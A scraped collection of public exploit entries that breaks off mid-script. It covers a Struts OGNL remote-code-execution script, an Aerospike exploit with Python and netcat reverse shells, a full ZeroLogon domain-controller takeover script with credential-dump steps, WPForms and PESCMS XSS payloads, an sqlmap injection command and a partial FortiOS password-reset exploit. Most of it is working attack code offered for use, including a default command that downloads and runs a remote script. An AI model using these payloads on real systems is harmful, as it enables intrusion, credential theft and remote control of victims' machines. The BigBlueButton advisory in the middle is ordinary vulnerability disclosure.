ISHACK AI BOT

# Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path # Date: 2020-11-07 # Exploit Author: Gerardo González # Vendor Homepage: https://consumer.huawei.com/mx # Software Link: https://consumer.huawei.com/mx # Version: 1.0.1.0 # Tested on: Windows 10 Home Single Language x64 Esp # Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ # Service info: Huawei LCD_Service LCD_Service C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe Auto C:\Users\gerar>sc qc "LCD_Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: LCD_Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Huawei LCD_Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation # Date: 08/18/2020 # Exploit Author: West Shepherd # Vendor Homepage: https://struts.apache.org/download.cgi # Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) # CVE : CVE-2019-0230 # Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. # Source(s): # https://github.com/PrinceFPF/CVE-2019-0230 # https://cwiki.apache.org/confluence/display/WW/S2-059 # *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 # !/usr/bin/python from sys import argv, exit, stdout, stderr import argparse import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning import logging class Exploit: def __init__( self, target='', redirect=False, proxy_address='' ): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.target = target self.session = requests.session() self.redirect = redirect self.timeout = 0.5 self.proxies = { 'http': 'http://%s' % proxy_address, 'https': 'http://%s' % proxy_address } \ if proxy_address is not None \ and proxy_address != '' else {} self.query_params = {} self.form_values = {} self.cookies = {} boundary = "---------------------------735323031399963166993862150" self.headers = { 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, 'Accept': '*/*', 'Connection': 'close' } payload = "%{(#nike='multipart/form-data')." \ "(#[email protected]@DEFAULT_MEMBER_ACCESS)." \ "(#_memberAccess?(#_memberAccess=#dm):" \ "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \ "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \ "(#ognlUtil.getExcludedPackageNames().clear())." \ "(#ognlUtil.getExcludedClasses().clear())." \ "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \ "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ "(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." \ "getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \ "(#ros.flush())}" self.payload = "--%s\r\nContent-Disposition: form-data; name=\"foo\"; " \ "filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( boundary, payload, boundary ) def do_get(self, url, params=None, data=None): return self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=data, params=params ) def do_post(self, url, data=None, params=None): return self.session.post( url=url, data=data, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params ) def debug(self): try: import http.client as http_client except ImportError: import httplib as http_client http_client.HTTPConnection.debuglevel = 1 logging.basicConfig() logging.getLogger().setLevel(logging.DEBUG) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True return self def send_payload(self, command='curl --insecure -sv https://10.10.10.10/shell.py|python -'): url = self.target stdout.write('sending payload to %s payload %s' % (url, command)) resp = self.do_post(url=url, params=self.query_params, data=self.payload.replace('{COMMAND}', command)) return resp if __name__ == '__main__': parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-0230 Struts 2 exploit') try: parser.add_argument('-target', action='store', help='Target address: http(s)://target.com/index.action') parser.add_argument('-command', action='store', help='Command to execute: touch /tmp/pwn') parser.add_argument('-debug', action='store', default=False, help='Enable debugging: False') parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080') if len(argv) == 1: parser.print_help() exit(1) options = parser.parse_args() exp = Exploit( proxy_address=options.proxy, target=options.target ) if options.debug: exp.debug() stdout.write('target %s debug %s proxy %s\n' % ( options.target, options.debug, options.proxy )) result = exp.send_payload(command=options.command) stdout.write('Response: %d\n' % result.status_code) except Exception as error: stderr.write('error in main %s' % str(error))

# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution # Date: 2020-08-01 # Exploit Author: Matt S # Vendor Homepage: https://www.aerospike.com/ # Version: < 5.1.0.3 # Tested on: Ubuntu 18.04 # CVE : CVE-2020-13151 #!/usr/bin/env python3 import argparse import random import os, sys from time import sleep import string # requires aerospike package from pip import aerospike # if this isn't installing, make sure os dependencies are met # sudo apt-get install python-dev # sudo apt-get install libssl-dev # sudo apt-get install python-pip # sudo apt-get install zlib1g-dev PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&""" NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&' def _get_client(cfg): try: return aerospike.client({ 'hosts': [(cfg.ahost, cfg.aport)], 'policies': {'timeout': 8000}}).connect() except Exception as e: print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}") def _send(client, cfg, _cmd): try: print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd])) except Exception as e: print(f"[-] UDF execution returned {e.msg}") def _register_udf(client, cfg): try: client.udf_put(cfg.udfpath) except Exception as e: print(f"[-] whoops, couldn't register the udf {cfg.udfpath}") raise e def _random_string(l): return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)]) def _populate_table(client, cfg): ns = cfg.namespace setname = cfg.setname print(f"[+] writing to {ns}.{setname}") try: rec = cfg.dummystring client.put((ns, setname, rec), {'pk':cfg.dummystring}) print(f"[+] wrote {rec}") except Exception as e: print(f"[-] unable to write record: {e.msg}") try: if e.msg.startswith('Invalid namespace'): print("Valid namespaces: ") for n in _info_parse("namespaces", client).split(";"): print(n.strip()) except: pass sys.exit(13) def _info_parse(k, client): try: return [i[1] for i in client.info_all(k).values() ][0] except Exception as e: print(f"error retrieving information: {e.msg}") return [] def _is_vuln(_mj, _mi, _pt, _bd): fixed = [5,1,0,0] found = [_mj, _mi, _pt, _bd] if fixed == found: return False for ix, val in enumerate(found): if val < fixed[ix]: return True elif val == fixed[ix]: pass else: return False def _version_check(client): print("[+] aerospike build info: ", end="") try: _ver = _info_parse("build", client) print(_ver) mj, mi, pt, bd = [int(i) for i in _ver.split('.')] if _is_vuln(mj, mi, pt, bd): print("[+] looks vulnerable") return else: print(f"[-] this instance is patched.") sys.exit(0) except Exception as e: print(f"[+] unable to interpret build number due to {e}") print("[+] continuing anyway... ") def _exploit(cfg): client = _get_client(cfg) if not client: return _version_check(client) print(f"[+] populating dummy table.") _populate_table(client, cfg) print(f"[+] registering udf") _register_udf(client, cfg) if cfg.pythonshell or cfg.netcatshell: sys.stdout.flush() print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="") sys.stdout.flush() for i in range(4): print(".", end="") sys.stdout.flush() sleep(1) print(".") _send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) ) if cfg.cmd: print(f"[+] issuing command \"{cfg.cmd}\"") _send(client, cfg, cfg.cmd) if __name__ == '__main__': if len(sys.argv) == 1: print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000") print("... or ... ") print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'") sys.exit(0) parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC') parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1") parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int) parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test") parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None) parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None) parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true") parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true") parser.add_argument("--lhost", help="host to use for reverse shell callback") parser.add_argument("--lport", help="port to use for reverse shell callback") parser.add_argument("--cmd", help="custom command to issue against the underlying host") parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None) cfg = parser.parse_args() if not cfg.setname: cfg.setname = 'cve202013151' if not cfg.dummystring: cfg.dummystring = _random_string(16) if not cfg.udfpath: cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua') assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport" if cfg.pythonshell or cfg.netcatshell: assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell" _exploit(cfg)

#Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated) #Exploit Author : ZwX #Exploit Date : 2020-10-23 #Vendor Homepage : https://wpforms.com/ #Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip [+] Description Vulnerability: ============================== A Cross Site Scripting vulnerability is located in the Wordpress plugin [WPForms] which affects version 1.6.3.1 and other versions lower. To exploit the vulnerability it is necessary to be identified, the attacker could hide JavaScript code without the knowledge of the owner of the site. [+] Proof Of Concept: ===================== # HTML Code # <textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><script>alert(1)</script></textarea> <textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><iframe src="https://Attacker.com/putty.exe" style="width:0;height:0;border:0; border:none;/></textarea> # Methode POST # POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-admin/admin.php?page=wpforms-builder&view=fields&form_id=990 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 7081 Origin: http://localhost Connection: close action=wpforms_save_form&data=[{"name":"id","value":"990"},{"name":"field_id","value":"5"},{"name":"fields[0][id]","value":"0"},{"name":"fields[0][type]","value":"name"},{"name":"fields[0][label]","value":"Nom"},{"name":"fields[0][format]","value":"first-last"},{"name":"fields[0][description]","value":"<script>alert(1)</script>"},{"name":"fields[0][required]","value":"1"},{"name":"fields[0][size]","value":"medium"},{"name":"fields[0][simple_placeholder]","value":""},{"name":"fields[0][simple_default]","value":""},{"name":"fields[0][first_placeholder]","value":""},{"name":"fields[0][first_default]","value":""},{"name":"fields[0][middle_placeholder]","value":""},{"name":"fields[0][middle_default]","value":""},{"name":"fields[0][last_placeholder]","value":""},{"name":"fields[0][last_default]","value":""},{"name":"fields[0][css]","value":""},{"name":"fields[1][id]","value":"1"},{"name":"fields[1][type]","value":"email"},{"name":"fields[1][label]","value":"E-mail"},{"name":"fields[1][description]","value":""},{"name":"fields[1][required]","value":"1"},{"name":"fields[1][size]","value":"medium"},{"name":"fields[1][placeholder]","value":""},{"name":"fields[1][confirmation_placeholder]","value":""},{"name":"fields[1][default_value]","value":""},{"name":"fields[1][css]","value":""},{"name":"fields[1][filter_type]","value":""},{"name":"fields[1][allowlist]","value":""},{"name":"fields[1][denylist]","value":""},{"name":"fields[2][id]","value":"2"},{"name":"fields[2][type]","value":"textarea"},{"name":"fields[2][label]","value":"Commentaire ou message"},{"name":"fields[2][description]","value":""},{"name":"fields[2][required]","value":"1"},{"name":"fields[2][size]","value":"medium"},{"name":"fields[2][placeholder]","value":""},{"name":"fields[2][limit_count]","value":"1"},{"name":"fields[2][limit_mode]","value":"characters"},{"name":"fields[2][default_value]","value":""},{"name":"fields[2][css]","value":""},{"name":"fields[3][id]","value":"3"},{"name":"fields[3][type]","value":"textarea"},{"name":"fields[3][label]","value":"Paragraphe"},{"name":"fields[3][description]","value":""},{"name":"fields[3][size]","value":"medium"},{"name":"fields[3][placeholder]","value":""},{"name":"fields[3][limit_count]","value":"1"},{"name":"fields[3][limit_mode]","value":"characters"},{"name":"fields[3][default_value]","value":""},{"name":"fields[3][css]","value":""},{"name":"fields[4][id]","value":"4"},{"name":"fields[4][type]","value":"textarea"},{"name":"fields[4][label]","value":"Paragraphe"},{"name":"fields[4][description]","value":""},{"name":"fields[4][size]","value":"medium"},{"name":"fields[4][placeholder]","value":""},{"name":"fields[4][limit_count]","value":"1"},{"name":"fields[4][limit_mode]","value":"characters"},{"name":"fields[4][default_value]","value":""},{"name":"fields[4][css]","value":""},{"name":"settings[form_title]","value":"Formulaire de contact simple"},{"name":"settings[form_desc]","value":""},{"name":"settings[form_class]","value":""},{"name":"settings[submit_text]","value":"Envoyer"},{"name":"settings[submit_text_processing]","value":"Envoi..."},{"name":"settings[submit_class]","value":""},{"name":"settings[antispam]","value":"1"},{"name":"settings[notification_enable]","value":"1"},{"name":"settings[notifications][1][email]","value":"{admin_email}"},{"name":"settings[notifications][1][subject]","value":"Nouvelle entrée : Formulaire de contact simple"},{"name":"settings[notifications][1][sender_name]","value":"Le Blog de ZwX"},{"name":"settings[notifications][1][sender_address]","value":"{admin_email}"},{"name":"settings[notifications][1][replyto]","value":"{field_id=\"1\"}"},{"name":"settings[notifications][1][message]","value":"{all_fields}"},{"name":"settings[confirmations][1][type]","value":"message"},{"name":"settings[confirmations][1][message]","value":"<p>Merci de nous avoir contacté ! Nous vous contacterons rapidement.</p>"},{"name":"settings[confirmations][1][message_scroll]","value":"1"},{"name":"settings[confirmations][1][page]","value":"262"},{"name":"settings[confirmations][1][redirect]","value":""}]&id=990&nonce=ec15a26a5a # URL Proof Of Concept # http://localhost/?wpforms_form_preview=990

# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege # Date: 2020-10-04 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 # Tested on: Microsoft Windows Server 2016 Standard x64 # CVE : CVE-2020-1472 # Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code # Sources: https://www.secura.com/pathtoimg.php?id=2055 # Requirements: python3 and impacket 0.9.21+ (tested using this version) #!/usr/bin/env python3 import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs from binascii import hexlify, unhexlify from subprocess import check_call from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED from impacket.dcerpc.v5 import nrpc, epm, transport from impacket import crypto, version from impacket.examples import logger from Cryptodome.Cipher import AES from struct import pack, unpack from impacket.dcerpc.v5.rpcrt import DCERPCException class Exploit: def __init__( self, name='', address='', attempts=2000, password='' ): name = name.rstrip('$') self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\ .ServerSecureChannel self.authenticator = self.getAuthenticator(stamp=0) self.clearNewPasswordBlob = b'\x00' * 516 self.primaryName = ('\\\\%s' % name) + '\x00' self.accountName = ('%s$' % name) + '\x00' self.computerName = name + '\x00' self.clientCredential = b'\x00' * 8 self.clientChallenge = b'\x00' * 8 self.negotiateFlags = 0x212fffff self.address = address self.max = attempts self.dce = None self.sessionKey = None self.clientStoredCredential = None self.password = password def encodePassword(self, password): if isinstance(password, str): password = password.encode('utf-8') return b'\x00' * (512 - len(password))\ + password \ + pack('<L', len(password)) def getAuthenticator(self, creds=b'\x00' * 8, stamp=10): authenticator = nrpc.NETLOGON_AUTHENTICATOR() authenticator['Credential'] = creds authenticator['Timestamp'] = stamp return authenticator def serverReqChallenge(self): try: binding = epm.hept_map( self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp' ) self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc() self.dce.connect() self.dce.bind(nrpc.MSRPC_UUID_NRPC) return nrpc.hNetrServerReqChallenge( self.dce, self.primaryName, self.computerName, self.clientChallenge ) except BaseException as ex: self.logError(ex) def serverAuthenticate(self): try: auth = nrpc.hNetrServerAuthenticate3( self.dce, self.primaryName, self.accountName, self.secureChannelType, self.computerName, self.clientCredential, self.negotiateFlags ) assert auth['ErrorCode'] == 0 self.logInfo('successfully authenticated') return True except nrpc.DCERPCSessionError as ex: self.dce = None if ex.get_error_code() == 0xc0000022: return None else: self.logFail(ex.get_error_code()) except BaseException as ex: self.dce = None self.logFail(ex) self.dce = None def serverPasswordSet(self): try: return nrpc.hNetrServerPasswordSet2( self.dce, self.primaryName, self.accountName, self.secureChannelType, self.computerName, self.authenticator, self.clearNewPasswordBlob ) except BaseException as ex: self.logError(ex) def authenticate(self): self.logInfo( 'checking target, attempting to authenticate %d max attempts' % self.max ) for attempt in range(0, self.max): self.logInfo('attempt %d' % attempt) self.serverReqChallenge() self.serverAuthenticate() if self.dce is not None: break if self.dce: return True else: self.logError('failed to authenticate') def exploit(self): self.logInfo('attempting password reset') reset = self.serverPasswordSet() if reset['ErrorCode'] == 0: self.logInfo('successfully reset password') else: self.logError('failed to reset password') return self def ComputeNetlogonCredentialAES(self, challenge): return nrpc.ComputeNetlogonCredentialAES( challenge, self.sessionKey ) def logInfo(self, message): sys.stdout.write("[+] %s\n" % str(message)) return self def logError(self, message): sys.stderr.write("[-] error %s\n" % str(message)) def logFail(self, message): sys.stderr.write("[!] failure %s\n" % str(message)) sys.exit(2) def restore(self): self.logInfo('attempting to restore password') self.clientChallenge = b'12345678' try: self.primaryName = NULL challenge = self.serverReqChallenge() self.sessionKey = nrpc.ComputeSessionKeyAES( '', self.clientChallenge, challenge['ServerChallenge'] ) self.clientCredential = self.ComputeNetlogonCredentialAES( self.clientChallenge ) try: self.serverAuthenticate() except Exception as e: if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0: raise self.logInfo('restoring password') self.clientStoredCredential = pack('<Q', unpack('<Q', self.clientCredential)[0] + 10) self.authenticator = self.getAuthenticator( creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential) ) self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES( self.encodePassword(self.password) ) reset = self.serverPasswordSet() if reset['ErrorCode'] == 0: self.logInfo('successfully restored password') else: self.logError('failed to restore password') except Exception as ex: self.logError(ex) return self if __name__ == '__main__': info = """ NOTE - Exploitation will break the DC until restored, recommended guidelines: 1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN: cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP> 2. Exploit the DC - this will break the DC until restored: cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP> 3. Dump the DC - for the DA hashes, this will not contain the machine hex-pass: secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP> 4. Dump the DC again - use the DA hash to get the machines hex-pass: secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP> 5. Restore target - this fixes the DC: cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP> -hex <HEXPASS> """ parser = argparse.ArgumentParser( description='CVE-2020-1472 ZeroLogon Exploit - Netlogon Elevation of Privilege', add_help=True ) try: parser.add_argument('-do', default='check', action='store', help='What to do (default check): [check|restore|exploit]') parser.add_argument('-target', action='store', help='NETBIOS name of target DC (not the FQDN)') parser.add_argument('-ip', action='store', help='IP address of target DC') parser.add_argument('-password', default='', action='store', help='The plaintext password to use to reset the DC') parser.add_argument('-hex', default='', action='store', help='The hex password to use to restore the DC (recommended)') parser.add_argument('-max', default=2000, action='store', help='Max attempts to authenticate with the DC (usually ~300 or less)') if len(sys.argv) < 3: parser.print_help() print(info) sys.exit(1) options = parser.parse_args() if options.do.lower() == 'check': Exploit( name=options.target, address=options.ip, attempts=int(options.max) ).authenticate() elif options.do.lower() == 'exploit': exp = Exploit( name=options.target, address=options.ip, attempts=int(options.max) ) if exp.authenticate(): exp.exploit() elif options.do.lower() == 'restore': if options.hex != '' and options.password == '': options.password = unhexlify(options.hex) if options.password != '': exp = Exploit( name=options.target, address=options.ip, password=options.password ).restore() else: parser.print_help() except Exception as error: sys.stderr.write('[-] error in main %s\n' % str(error))

# Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery # Date: 2020-09-11 # Exploit Author: RedTeam Pentesting GmbH # Vendor Homepage: https://bigbluebutton.org/ # Version: BigBlueButton 2.2.25 RedTeam Pentesting discovered a vulnerability in the BigBlueButton web conferencing system which allows participants of a conference with permissions to upload presentations to read arbitrary files from the file system and perform server-side requests. This leads to administrative access to the BigBlueButton instance. Details ======= Product: BigBlueButton Affected Versions: 2.2.25, potentially earlier versions as well Fixed Versions: 2.2.27 Vulnerability Type: Arbitrary File Disclosure and Server-Side Request Forgery Security Risk: medium Vendor URL: https://bigbluebutton.org/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005 Advisory Status: published CVE: CVE-2020-25820 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820 Introduction ============ "BigBlueButton is a web conferencing system designed for online learning." (from the vendor's homepage) More Details ============ BigBlueButton is a web conferencing system that allows participants with the appropriate privileges to upload files in various formats to be used as presentation slides. Among other formats, BigBlueButton accepts LibreOffice documents[1]. LibreOffice documents use the XML-based Open Document Format for Office Applications (ODF)[2]. For technical purposes, uploaded files are converted to PDF format with LibreOffice and afterwards to SVG for displaying[6]. The ODF file format supports using the XML Linking Language (XLink) to create links between documents[3]. When local files are referenced using XLinks, the contents of the respective files are included in the generated PDF file when BigBlueButton converts ODF documents with LibreOffice. This leads to an arbitrary file disclosure vulnerability, allowing malicious participants of conferences to extract files from the BigBlueButton server's file system. LibreOffice also embeds XLinks to remote locations when a document is converted, which allows to perform server-side requests. Proof of Concept ================ Start from an empty ODF Text Document and extract the content: $ mkdir tmp-doc && cd tmp-doc $ unzip ../empty.odt Archive: empty.odt extracting: mimetype creating: Configurations2/accelerator/ creating: Configurations2/images/Bitmaps/ creating: Configurations2/toolpanel/ creating: Configurations2/progressbar/ creating: Configurations2/statusbar/ creating: Configurations2/toolbar/ creating: Configurations2/floater/ creating: Configurations2/popupmenu/ creating: Configurations2/menubar/ inflating: manifest.rdf inflating: meta.xml inflating: settings.xml extracting: Thumbnails/thumbnail.png inflating: styles.xml inflating: content.xml inflating: META-INF/manifest.xml Replace the <office:body> element in the file content.xml with the following: <office:body> <office:text> <text:section text:name="string"> <text:section-source xlink:href="file:///etc/passwd" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/> </text:section> </office:text> </office:body> The text document now includes a section that references the external file /etc/passwd. Create an new ODF Text Document with the modified content: $ zip -r ../modified.odt * The document can now be uploaded as a presentation. After the conversion, the presentation shows the contents of the file /etc/passwd from the system running the BigBlueButton conferencing software. To perform server-side requests, substitute the xlink:href attribute's value with a remote URL such as http://example.com: <office:body> <office:text> <text:section text:name="string"> <text:section-source xlink:href="http://example.com" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/> </text:section> </office:text> </office:body> When converting a document with this content, LibreOffice will fetch the website's content and embed it into the generated PDF file. Workaround ========== To work around this issue, the conversion feature should be disabled if it is not used. Otherwise, permission to upload presentations should only be given to trusted users. Additionally, the allowed file types for upload can be restricted to just PDF files. Fix === Update to fixed version 2.2.27. Change API key after update. Security Risk ============= As shown, the presentation conversion feature of BigBlueButton can be used to disclose arbitrary local files. Through the file disclosure, attackers can gain access to the credentials of the BigBlueButton instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties, /usr/share/bbb-apps-akka/conf/application.conf), which allows for administrative access to BigBlueButton through its API (see [5]), including all conferences. Additionally, it is possible to perform server-side requests. Note that this vulnerability is different from CVE-2018-10583 [4], because the risk is not the disclosure of credentials sent while fetching remote resources, but the ability to access resources that are in the same network segment as the BigBlueButton instance, which is possibly not accessible from the Internet. To exploit this vulnerability, attackers need to have access to a conference with the ability to upload presentations. While successful exploitation of this vulnerability would pose severe consequences for the affected BigBlueButton instance, it is only rated to pose a medium risk due to the requirement of having presentator access. Timeline ======== 2020-09-11 Vulnerability identified 2020-09-18 Customer approved disclosure to vendor 2020-09-22 CVE ID requested 2020-09-22 CVE ID assigned 2020-09-24 Requested encrypted communication with vendor 2020-09-25 Vendor unable to provide encrypted communication, Vendor notified 2020-09-25 Vendor confirmed being able to reproduce vulnerability, mentioned similar bugreport 2020-09-25 Requested information whether "similar burgreport" uses the same vulnerability - no answer 2020-10-13 Again requested information whether "similar burgreport" uses the same vulnerability, whether release shedule is known - no answer 2020-10-14 Vendor released fixed version (without mentioning vulnerability) 2020-10-21 Vulnerability published by third party [7] 2020-10-21 Advisory released References ========== [1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton [2] http://opendocumentformat.org/ [3] https://www.w3.org/TR/xlink11/ [4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583 [5] https://docs.bigbluebutton.org/dev/api.html#usage [6] https://docs.bigbluebutton.org/support/faq.html#presentations [7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS # Date: 2020-11-18 # Exploit Author: icekam # Vendor Homepage: https://www.pescms.com/ # Software Link: https://github.com/lazyphp/PESCMS-TEAM # Version: PESCMS Team 2.3.2 # CVE: CVE-2020-28092 PESCMS Team 2.3.2 has multiple reflected XSS via the id parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id= please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6 now I input payload : "><ScRiPt>alert(1)</ScRiPt>

# Exploit Title: xuucms 3 - 'keywords' SQL Injection # Date: 2020-11-18 # Exploit Author: icekam # Vendor Homepage: https://www.cxuu.top/ # Software Link: https://github.com/cbkhwx/cxuucmsv3 # Version: cxuucms - v3 # CVE : CVE-2020-28091 SQL injection exists in search.php. For details, please refer to: https://github.com/cbkhwx/cxuucmsv3/issues/1 Use SQLMAP authentication: sqlmap -u 'http://localhost/search.php?keywords=12345678' --dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o --batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36' -b --current-db --hostname

# Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification # Google Dork: intitle:"Please Login" "Use FTM Push" # Date: 15/11/2020 # Exploit Author: Ricardo Longatto # Details: This exploit allow change users password from SSLVPN web portal # Vendor Homepage: https://www.fortinet.com/ # Version: Exploit to Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10. # Tested on: 6.0.4 # NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-13382 # CVE : CVE-2018-13382 # Credits: Vulnerability by Meh Chang and Orange Tsai. #!/usr/bin/env python import requests, urllib3, sys, re, argparse urllib3.disable_warnings() menu = argparse.ArgumentParser(description = "[+] Exploit FortiOS Magic backdoor - CVE-2018-13382 [+]") menu.add_argument('-t', metavar='Target/Host IP', required=True) menu.add_argument('-p', metavar='Port', required=True) menu.add_argument('-u', metavar='User', required=True) menu.add_argument('--setpass', metavar='SetNewPass', default='h4ck3d', help='set the password for user, if you not set, the default password will be set to h4ck3d') op = menu.parse_args() host = op.t port = op.p user = 